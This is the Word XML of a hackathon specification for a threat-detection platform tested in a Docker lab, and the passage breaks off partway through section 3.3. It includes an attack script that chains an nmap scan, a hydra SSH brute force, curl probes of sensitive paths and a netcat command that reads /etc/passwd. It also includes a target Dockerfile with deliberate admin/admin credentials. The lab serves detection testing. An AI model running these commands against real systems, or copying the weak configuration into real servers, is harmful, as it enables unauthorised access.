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80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00D4FF"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">⬡  SENTINEL-X  ⬡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION 3.0 — REAL-ATTACK EDITION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="00D4FF" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="8899AA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AI-Driven Threat Detection &amp; Response Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="AABBCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Technical Specification &amp; Architecture Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="8899AA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hack Malenadu '26  ·  Problem Statement 3  ·  April 17,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E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0A1F35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8899AA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">STATUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0A2A1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">✔  PRODUCTION READY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8899AA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEMO MODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF6B35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡  ZERO SIMULATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8899AA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ARCHITECTURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A855F7"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3-Container Docker Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SENTINEL-X v3.0 is a production-grade Security Operations Center (SOC) platform that eliminates the fundamental weakness of all demo-mode security tools: fake data. Every alert fired by Sentinel-X v3.0 is triggered by a genuine attack — real Kali Linux tools running against a real Ubuntu target, generating authentic OS log entries that the detection engine reads directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document defines the complete architecture, implementation plan, and upgrade path from Sentinel-X v2.1 to v3.0, incorporating the Real-Attack Docker Lab as the centrepiece demonstration environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key Innovations in v3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-simulation attack demonstration — real Kali Linux tools, real Ubuntu target, real auth.log entries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3-container Docker Compose lab (attacker / target / sentinel-x) on an isolated network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared-volume log streaming: target /var/log mounted read-only into Sentinel-X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker socket secondary telemetry path for container event streaming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated attack orchestration script sequences nmap → hydra → curl → netcat in one command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All existing 7-layer SOC capabilities fully preserved and enhanced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. SYSTEM ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1  The Problem with Simulated Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Sentinel-X v2.1 system demonstrated threat detection using replayed CICIDS 2017 dataset events and injected synthetic log entries. While functionally correct, this approach has a critical credibility gap in live demos: judges and evaluators immediately recognise injected events as artificial, undermining confidence in the detection engine's real-world applicability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel-X v3.0 solves this permanently. The system now operates identically to professional red-team/blue-team labs such as Hack The Box and DVWA — real attack tools against a deliberately vulnerable target, monitored by a genuine detection engine reading actual OS logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2  Three-Container Docker Lab Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The entire lab runs as three Docker containers on a single isolated bridge network, launched with one command. No external infrastructure, no cloud dependencies, no fake events.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Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Base Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Role &amp; Key Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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kali-rolling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Attack platform — nmap, hydra, curl, netcat, attack_orchestrator.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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ubuntu:22.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Victim machine — SSH open (port 22), Apache2 (port 80), weak credentials (admin/admin), generates real /var/log/auth.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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sentinel-x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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python:3.11-slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Detection engine — mounts target /var/log as read-only volume, reads Docker socket for container telemetry, runs all 7 SOC layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3  Data Flow: How Real Logs Reach Sentinel-X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel-X observes target logs through two independent paths, ensuring no attack event is missed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH 1 — Shared Volume (Primary): The target container's /var/log directory is mounted into the Sentinel-X container at /target-logs as a read-only Docker volume. The Linux agent reads /target-logs/auth.log exactly as it reads any local log file. When hydra fires 500 SSH login attempts, each failed attempt writes a genuine PAM authentication failure to auth.log — Sentinel-X reads that file in real time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH 2 — Docker Socket (Secondary): /var/run/docker.sock is mounted into Sentinel-X, granting access to the Docker API. The container telemetry module streams container stdout/stderr logs via the Docker Events API, providing a backup telemetry channel and enabling detection of container-lifecycle-level events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This dual-path design mirrors how enterprise EDR products monitor host and container workloads simultaneously — it is not a demo hack, it is the correct production pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. CONTAINER SPECIFICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1  Attacker Container (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker container is a minimal Kali Linux environment pre-loaded with exactly the tools needed for the demo attack sequence. No interactive use is required — the entire attack is automated.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Attacker Container — Dockerfile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FROM kalilinux/kali-rolling</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RUN apt-get update &amp;&amp; apt-get install -y \</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nmap hydra curl netcat-openbsd \</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&amp;&amp; rm -rf /var/lib/apt/lists/*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COPY attack_orchestrator.sh /attack_orchestrator.sh</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RUN chmod +x /attack_orchestrator.sh</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CMD ["sleep", "infinity"]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">attack_orchestrator.sh — The Demo Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A single bash script sequences all four attack phases automatically. Each phase generates distinct, detectable log signatures in the target's auth.log and Apache access log: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attack_orchestrator.sh</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#!/bin/bash</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TARGET_IP="172.20.0.3"  # target container IP</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echo "[*] PHASE 1: Port Reconnaissance (nmap)"</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nmap -sV -p 22,80,443,3306 $TARGET_IP</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sleep 5</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echo "[*] PHASE 2: SSH Brute Force (hydra)"</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hydra -l admin -P /usr/share/wordlists/rockyou.txt \</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-t 4 -f ssh://$TARGET_IP</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sleep 5</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echo "[*] PHASE 3: Web Application Probing (curl)"</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for path in /admin /phpmyadmin /.env /wp-admin /config; do</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curl -s -o /dev/null http://$TARGET_IP$path</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done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sleep 5</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echo "[*] PHASE 4: Reverse Shell Attempt (netcat)"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echo "id; whoami; cat /etc/passwd" | nc $TARGET_IP 4444 -w 3</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echo "[*] Attack sequence complete."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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="496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Log Signature Generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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1 — Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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~30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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TCP SYN probes in /var/log/syslog, Apache access log entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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2 — Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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~60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Hundreds of PAM auth failures in /var/log/auth.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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3 — Web Probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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~15s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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HTTP 404/403 requests to sensitive paths in Apache access log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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4 — Shell Attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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~15s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Connection attempt logged in syslog, netstat output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2  Target Container (Ubuntu 22.04)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target is a deliberately misconfigured Ubuntu 22.04 system — intentionally weak in the same ways that real compromised enterprise systems are weak. This is the Hack The Box / DVWA model: a controlled vulnerable environment designed for learning and demonstration, not for production use.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Target Container — Dockerfile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FROM ubuntu:22.04</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RUN apt-get update &amp;&amp; apt-get install -y \</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openssh-server apache2 \</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&amp;&amp; rm -rf /var/lib/apt/lists/*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Create vulnerable user with weak credentials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RUN useradd -m -s /bin/bash admin &amp;&amp; \</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echo "admin:admin" | chpasswd &amp;&amp; \</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mkdir /var/run/sshd</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Configure SSH to allow password authentication</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RUN sed -i "s/#PasswordAuthentication yes/PasswordAuthentication yes/" \</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/etc/ssh/sshd_config</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EXPOSE 22 80</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CMD service ssh start &amp;&amp; apache2ctl -D FOREGROUND</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target container intentionally includes: SSH with password authentication enabled, an admin account with the password "admin", and Apache running with default configuration. These weaknesses ensure that the attacker's tools generate rich, realistic log output — exactly what a real poorly-secured server would produce.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3  Sentinel-X Container (Detection Engine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
